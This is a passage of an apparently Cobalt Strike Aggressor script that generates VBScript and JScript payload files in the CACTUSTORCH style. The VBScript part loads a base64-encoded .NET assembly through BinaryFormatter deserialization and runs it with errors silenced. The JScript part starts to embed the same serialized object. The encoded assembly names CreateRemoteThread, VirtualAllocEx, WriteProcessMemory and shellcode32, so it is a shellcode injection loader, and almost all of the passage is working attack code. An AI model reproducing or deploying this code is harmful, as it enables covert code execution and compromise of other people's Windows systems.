199 | $data = $data . "s = s & \"AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA\"\r\n";
200 | $data = $data . "s = s & \"AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP\"\r\n";
201 | $data = $data . "s = s & \"AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA\"\r\n";
202 | $data = $data . "s = s & \"VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw\"\r\n";
203 | $data = $data . "s = s & \"AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA\"\r\n";
204 | $data = $data . "s = s & \"LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
205 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
206 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAADAAAAwAAAB0NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
207 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
208 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
209 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
210 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
211 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
212 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
213 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
214 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
215 | $data = $data . "s = s & \"AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv\"\r\n";
216 | $data = $data . "s = s & \"bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA\"\r\n";
217 | $data = $data . "entry_class = \"cactusTorch\"\r\n";
218 | $data = $data . "Dim fmt, al, d, o\r\n";
219 | $data = $data . "Set fmt = CreateObject(\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\")\r\n";
220 | $data = $data . "Set al = CreateObject(\"System.Collections.ArrayList\")\r\n";
221 | $data = $data . "al.Add fmt.SurrogateSelector\r\n";
222 | $data = $data . "Set d = fmt.Deserialize_2(Base64ToStream(s))\r\n";
223 | $data = $data . "Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)\r\n";
224 | $data = $data . "o.flame binary,code\r\n";
225 | $data = $data . "End Sub\r\n";
226 | $data = $data . "SetVersion\r\n";
227 | $data = $data . "On Error Resume Next\r\n";
228 | $data = $data . "Run\r\n";
229 | $data = $data . "If Err.Number <> 0 Then\r\n";
230 | $data = $data . " Debug Err.Description\r\n";
231 | $data = $data . " Err.Clear\r\n";
232 | $data = $data . "End If";
233 |
234 | # data is all inserted at this point.
235 |
236 | }
237 | else if (%options["type"] eq "JScript") {
238 | # They want JScript
239 | $data = $data . "var binary = \"" . %options["binary"] . "\";\r\n";
240 | $data = $data . "var code = \"";
241 | $data = $data . $b64payload . "\"\r\n";
242 |
243 | # variables set at this point
244 |
245 | $data = $data . "function setversion() {\r\n";
246 | $data = $data . "}\r\n";
247 | $data = $data . "function debug(s) {}\r\n";
248 | $data = $data . "function base64ToStream(b) {\r\n";
249 | $data = $data . " var enc = new ActiveXObject(\"System.Text.ASCIIEncoding\");\r\n";
250 | $data = $data . " var length = enc.GetByteCount_2(b);\r\n";
251 | $data = $data . " var ba = enc.GetBytes_4(b);\r\n";
252 | $data = $data . " var transform = new ActiveXObject(\"System.Security.Cryptography.FromBase64Transform\");\r\n";
253 | $data = $data . " ba = transform.TransformFinalBlock(ba, 0, length);\r\n";
254 | $data = $data . " var ms = new ActiveXObject(\"System.IO.MemoryStream\");\r\n";
255 | $data = $data . " ms.Write(ba, 0, (length / 4) * 3);\r\n";
256 | $data = $data . " ms.Position = 0;\r\n";
257 | $data = $data . " return ms;\r\n";
258 | $data = $data . "}\r\n";
259 | $data = $data . "var serialized_obj = \"AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy\"+\r\n";
260 | $data = $data . "\"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph\"+\r\n";
261 | $data = $data . "\"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk\"+\r\n";
262 | $data = $data . "\"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD\"+\r\n";
263 | $data = $data . "\"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl\"+\r\n";
264 | $data = $data . "\"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU\"+\r\n";
265 | $data = $data . "\"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl\"+\r\n";
266 | $data = $data . "\"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90\"+\r\n";
267 | $data = $data . "\"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu\"+\r\n";
268 | $data = $data . "\"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH\"+\r\n";
269 | $data = $data . "\"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA\"+\r\n";
270 | $data = $data . "\"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw\"+\r\n";
271 | $data = $data . "\"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu\"+\r\n";
272 | $data = $data . "\"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA\"+\r\n";
273 | $data = $data . "\"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u\"+\r\n";
274 | $data = $data . "\"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5\"+\r\n";
275 | $data = $data . "\"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR\"+\r\n";
276 | $data = $data . "\"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA\"+\r\n";
277 | $data = $data . "\"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y\"+\r\n";
278 | $data = $data . "\"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh\"+\r\n";
279 | $data = $data . "\"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz\"+\r\n";
280 | $data = $data . "\"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA\"+\r\n";
281 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy\"+\r\n";
282 | $data = $data . "\"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAkNhXWQAAAAAA\"+\r\n";
283 | $data = $data . "\"AAAA4AAiIAsBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA\"+\r\n";
284 | $data = $data . "\"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAIDUA\"+\r\n";
285 | $data = $data . "\"AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
286 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA\"+\r\n";
287 | $data = $data . "\"AAAALnRleHQAAAB4FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA\"+\r\n";
288 | $data = $data . "\"AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA\"+\r\n";
289 | $data = $data . "\"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAAIABQD4IQAAKBMAAAEAAAAAAAAA\"+\r\n";
290 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT\"+\r\n";
291 | $data = $data . "\"MAoABwEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMJAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA\"+\r\n";
292 | $data = $data . "\"Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME\"+\r\n";
293 | $data = $data . "\"EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAosbhEFFnMRAAAK\"+\r\n";
294 | $data = $data . "\"ByAAMAAAH0AoAgAABhMGEgYoFgAACnJXAABwKBgAAAosChEFFigEAAAGJioWEwcSCAaOaSgRAAAK\"+\r\n";
295 | $data = $data . "\"EQURBgYRCBEHKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMRAAAKKAUAAAYmKnoCfhUAAAp9AgAA\"+\r\n";
296 | $data = $data . "\"BAIoDwAACgICKBkAAAp9AQAABCoAABMwAgBgAAAAAAAAAAJ+FQAACn0rAAAEAn4VAAAKfSwAAAQC\"+\r\n";
297 | $data = $data . "\"fhUAAAp9LQAABAJ+FQAACn04AAAEAn4VAAAKfTkAAAQCfhUAAAp9OgAABAJ+FQAACn07AAAEAigP\"+\r\n";
298 | $data = $data . "\"AAAKAgIoGQAACn0qAAAEKkJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAACgHAAAj\"+\r\n";
299 | $data = $data . "\"fgAAlAcAAEwJAAAjU3RyaW5ncwAAAADgEAAAXAAAACNVUwA8EQAAEAAAACNHVUlEAAAATBEAANwB\"+\r\n";
300 | $data = $data . "\"AAAjQmxvYgAAAAAAAAACAAABVx0CFAkCAAAA+gEzABYAAAEAAAAXAAAACQAAAFAAAAAJAAAAHwAA\"+\r\n";
301 | $data = $data . "\"ABkAAAAzAAAAEgAAAAEAAAABAAAABQAAAAEAAAABAAAABwAAAAAAmQYBAAAAAAAGAFwFkgcGAMkF\"+\r\n";
302 | $data = $data . "\"kgcGAIoEYAcPALIHAAAGALIE4QYGADAF4QYGABEF4QYGALAF4QYGAHwF4QYGAJUF4QYGAMkE4QYG\"+\r\n";
303 | $data = $data . "\"AJ4EcwcGAHwEcwcGAPQE4QYGAKsIqQYGAGEEqQYGAE0FqQYGALAGqQYGAMoIqQYGAFkHqQYGAL4I\"+\r\n";
304 | $data = $data . "\"qQYGAGYGqQYGAIQGcwcAAAAAJQAAAAAAAQABAAEAEABtBgAAPQABAAEACgAQAPgHAAA9AAEACAAK\"+\r\n";
305 | $data = $data . "\"ARAAzgYAAEEABAAJAAIBAAAbCAAASQAIAAkAAgEAADYIAABJACcACQAKABAABgcAAD0AKgAJAAIB\"+\r\n";
306 | $data = $data . "\"AABtBAAASQA8AAoAAgEAAPMGAABJAEUACgAGAH0G+gAGAEQHPwAGACQE/QAGAHQIPwAGAOcDPwAG\"+\r\n";
307 | $data = $data . "\"AMgD+gAGAL0D+gAGBp4DAAFWgLICAwFWgMACAwFWgGQAAwFWgIgCAwFWgMIAAwFWgFMCAwFWgPEB\"+\r\n";
308 | $data = $data . "\"AwFWgB0CAwFWgAUCAwFWgKABAwFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWgE0CAwFWgDECAwFW\"+\r\n";
309 | $data = $data . "\"gGoDAwFWgIIDAwFWgJkCAwFWgB0DAwFWgHYBAwFWgHUAAwFWgD0AAwFWgCcBAwFWgKgAAwFWgDoD\"+\r\n";
310 | $data = $data . "\"AwFWgLkBAwFWgBgBAwFWgMYBAwFWgOUCAwEGBp4DAAFWgJEABwFWgHICBwEGAKYD+gAGAO8DPwAG\"+\r\n";
311 | $data = $data . "\"ABcHPwAGADMEPwAGAEsD+gAGAJoD+gAGAOcF+gAGAO8F+gAGAEcI+gAGAFUI+gAGAOQE+gAGAC4I\"+\r\n";
312 | $data = $data . "\"+gAGAOcICwEGAA0ACwEGABkAPwAGANIIPwAGANwIPwAGADQHPwAGBp4DAAFWgN4CDgFWgO8ADgFW\"+\r\n";
313 | $data = $data . "\"gJ0BDgFWgNgCDgFWgNUBDgFWgA8BDgFWgJQBDgFWgAMBDgEGBp4DAAFWgOcAEgFWgFcAEgFWgNUA\"+\r\n";
314 | $data = $data . "\"EgFWgFgDEgFWgGkCEgFWgE8DEgFWgN0AEgFWgGADEgFWgBEGEgFWgCQGEgFWgDkGEgEAAAAAgACW\"+\r\n";
315 | $data = $data . "\"IC4AFgEBAAAAAACAAJYg8wgqAQsAAAAAAIAAliAJCTUBEAAAAAAAgACWIGMIPwEVAAAAAACAAJEg\"+\r\n";
316 | $data = $data . "\"1ANFARcAUCAAAAAAhhg+BwYAHgBYIAAAAACGAE0EUAEeAGshAAAAAIYYPgcGACAAjCEAAAAAhhg+\"+\r\n";
317 | $data = $data . "\"BwYAIAAAAAEAOwQAAAIAUwQAAAMA5AcAAAQA0QcAAAUAwQcAAAYACwgAAAcAvAgAAAgAHAkBAAkA\"+\r\n";
318 | $data = $data . "\"BAcCAAoAzAYAAAEAGwQAAAIAiwgAAAMAAwYAAAQAawQAAAUAsggAAAEAdAgAAAIAfQgAAAMAIQcA\"+\r\n";
319 | $data = $data . "\"AAQAAwYAAAUAtQYAAAEAdAgAAAIA+gMAAAEAdAgAAAIA0QcAAAMA9wUAAAQAlQgAAAUAKAcAAAYA\"+\r\n";
320 | $data = $data . "\"CwgAAAcAsgMAAAEAAgkAAAIAAQAJAD4HAQARAD4HBgAZAD4HCgApAD4HEAAxAD4HEAA5AD4HEABB\"+\r\n";
321 | $data = $data . "\"AD4HEABJAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABxAD4HEACJAD4HBgB5AD4HBgCZAFMG\"+\r\n";
322 | $data = $data . "\"KQChAD4HAQCpAAQELwCxAHkGNACxAKQIOAChABIHPwChAGQGQgCxADsJRgCxAC8JRgC5AAoGTAAJ\"+\r\n";
323 | $data = $data . "\"ACQAWgAJACgAXwAJACwAZAAJADAAaQAJADQAbgAJADgAcwAJADwAeAAJAEAAfQAJAEQAggAJAEgA\"+\r\n";
324 | $data = $data . "\"hwAJAEwAjAAJAFAAkQAJAFQAlgAJAFgAmwAJAFwAoAAJAGAApQAJAGQAqgAJAGgArwAJAGwAtAAJ\"+\r\n";
325 | $data = $data . "\"AHAAuQAJAHQAvgAJAHgAwwAJAHwAyAAJAIAAzQAJAIQA0gAJAIgA1wAJAIwA3AAJAJAA4QAJAJQA\"+\r\n";
326 | $data = $data . "\"5gAJAJgA6wAJAKAAWgAJAKQAXwAJAPQAlgAJAPgAmwAJAPwA8AAJAAABuQAJAAQB4QAJAAgB9QAJ\"+\r\n";
327 | $data = $data . "\"AAwBvgAJABABwwAJABgBbgAJABwBcwAJACABeAAJACQBfQAJACgBWgAJACwBXwAJADABZAAJADQB\"+\r\n";
328 | $data = $data . "\"aQAJADgBggAJADwBhwAJAEABjAAuAAsAVgEuABMAXwEuABsAfgEuACMAhwEuACsAhwEuADMAmAEu\"+\r\n";
329 | $data = $data . "\"ADsAmAEuAEMAhwEuAEsAhwEuAFMAmAEuAFsAngEuAGMApAEuAGsAzgFDAFsAngGjAHMAWgDDAHMA\"+\r\n";
330 | $data = $data . "\"WgADAXMAWgAjAXMAWgAaAIwGAAEDAC4AAQAAAQUA8wgBAAABBwAJCQEAAAEJAGMIAQAAAQsA1AMB\"+\r\n";
331 | $data = $data . "\"AASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAAAAMAAgAEAAIABQACAAYA\"+\r\n";
332 | $data = $data . "\"AgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQyAGxwUmVzZXJ2ZWQyADxN\"+\r\n";
333 | $data = $data . "\"b2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJPTV9KT0IARVhFQ1VURV9S\"+\r\n";
334 | $data = $data . "\"RUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9VTkRfRU5EAERVUExJQ0FU\"+\r\n";
335 | $data = $data . "\"RV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBDUkVBVEVfTkVXX0NPTlNP\"+\r\n";
336 | $data = $data . "\"TEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RVU1RPUkNIAFdSSVRFX1dB\"+\r\n";
337 | $data = $data . "\"VENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xF\"+\r\n";
338 | $data = $data . "\"VkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNT\"+\r\n";
339 | $data = $data . "\"X01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVfTkVXX1BST0NFU1NfR1JP\"+\r\n";
340 | $data = $data . "\"VVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VTAENSRUFURV9GT1JDRURP\"+\r\n";
341 | $data = $data . "\"UwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNTAEhJR0hfUFJJT1JJ\"+\r\n";
342 | $data = $data . "\"VFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05PUk1BTF9QUklPUklU\"+\r\n";
343 | $data = $data . "\"WV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVUQUNIRURfUFJPQ0VTUwBD\"+\r\n";
344 | $data = $data . "\"UkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJP\"+\r\n";
345 | $data = $data . "\"Q0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVMVABDUkVBVEVfVU5J\"+\r\n";
346 | $data = $data . "\"Q09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5UAENSRUFURV9OT19X\"+\r\n";
347 | $data = $data . "\"SU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVSSVRfUEFSRU5UX0FGRklO\"+\r\n";
348 | $data = $data . "\"SVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNiAG1zY29ybGliAGxwVGhy\"+\r\n";
349 | $data = $data . "\"ZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAaFRocmVhZABs\"+\r\n";
350 | $data = $data . "\"cFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxlAGxwSGFuZGxlAGJJbmhl\"+\r\n";
351 | $data = $data . "\"cml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBDb21tYW5kTGluZQBW\"+\r\n";
352 | $data = $data . "\"YWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1\"+\r\n";
353 | $data = $data . "\"dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJh\"+\r\n";
354 | $data = $data . "\"ZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmli\"+\r\n";
355 | $data = $data . "\"dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0\"+\r\n";
356 | $data = $data . "\"cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNz\"+\r\n";
357 | $data = $data . "\"ZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5\"+\r\n";
358 | $data = $data . "\"Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1hTaXplAGR3\"+\r\n";
359 | $data = $data . "\"WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNI\"+\r\n";
360 | $data = $data . "\"RV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBGcm9tQmFzZTY0U3RyaW5n\"+\r\n";
361 | $data = $data . "\"AFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJuZWwzMi5kbGwAQ0FD\"+\r\n";
362 | $data = $data . "\"VFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AbHBQcm9jZXNz\"+\r\n";
363 | $data = $data . "\"SW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJ\"+\r\n";
364 | $data = $data . "\"bmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3RkRXJyb3IALmN0b3IAbHBT\"+\r\n";
365 | $data = $data . "\"ZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGlt\"+\r\n";
366 | $data = $data . "\"ZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dp\"+\r\n";
367 | $data = $data . "\"bmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJp\"+\r\n";
368 | $data = $data . "\"YnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxh\"+\r\n";
369 | $data = $data . "\"Z3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFycwBU\"+\r\n";
370 | $data = $data . "\"ZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRB\"+\r\n";
371 | $data = $data . "\"ZGRyZXNzAENvbmNhdABPYmplY3QAZmxQcm90ZWN0AGxwRW52aXJvbm1lbnQAQ29udmVydABoU3Rk\"+\r\n";
372 | $data = $data . "\"SW5wdXQAaFN0ZE91dHB1dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABiaW5hcnkAV3JpdGVQ\"+\r\n";
373 | $data = $data . "\"cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBvcF9FcXVhbGl0eQBvcF9JbmVxdWFsaXR5\"+\r\n";
374 | $data = $data . "\"AAAAAAABABlQAHIAbwBnAHIAYQBtAFcANgA0ADMAMgAADXcAaQBuAGQAaQByAAAVXABTAHkAcwBX\"+\r\n";
375 | $data = $data . "\"AE8AVwA2ADQAXAAAFVwAUwB5AHMAdABlAG0AMwAyAFwAAAMwAAAARY+bzuLqxE+aSSAzLsphXgAE\"+\r\n";
376 | $data = $data . "\"IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgcJHQUYEhwREA4YGAgYBQABHQUOBAABDg4DIAAIBgAD\"+\r\n";
377 | $data = $data . "\"Dg4ODgIGGAMgAA4FAAICDg4EAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAAAAQIAAAABBAAAAAE\"+\r\n";
378 | $data = $data . "\"IAAAAARAAAAABIAAAAAEAAEAAAQAAgAABAAEAAAEAAgAAAQAEAAABAAgAAAEAEAAAAQAgAAABAAA\"+\r\n";
379 | $data = $data . "\"AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAgQAAAAEBAAAAAgEAAAAEAQAAAAg\"+\r\n";
380 | $data = $data . "\"BAAAAEAEAAAAgAQAMAAABAAAQAACBggCBgICBgkDBhEUAwYRGAIGBgMGESADBhEkEwAKGA4OEgwS\"+\r\n";
381 | $data = $data . "\"DAIRFBgOEhwQERAKAAUYGBgYESARJAkABQIYGB0FGAgFAAICGAkKAAcYGBgJGBgJGAUgAgEODggB\"+\r\n";
382 | $data = $data . "\"AAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAQAQALQ0FDVFVT\"+\r\n";
383 | $data = $data . "\"VE9SQ0gAAAUBAAAAAAUBAAEAACkBACQ1NjU5OGYxYy02ZDg4LTQ5OTQtYTM5Mi1hZjMzN2FiZTU3\"+\r\n";
384 | $data = $data . "\"NzcAAAwBAAcxLjAuMC4wAAAASDUAAAAAAAAAAAAAYjUAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
385 | $data = $data . "\"AFQ1AAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAA\"+\r\n";
386 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
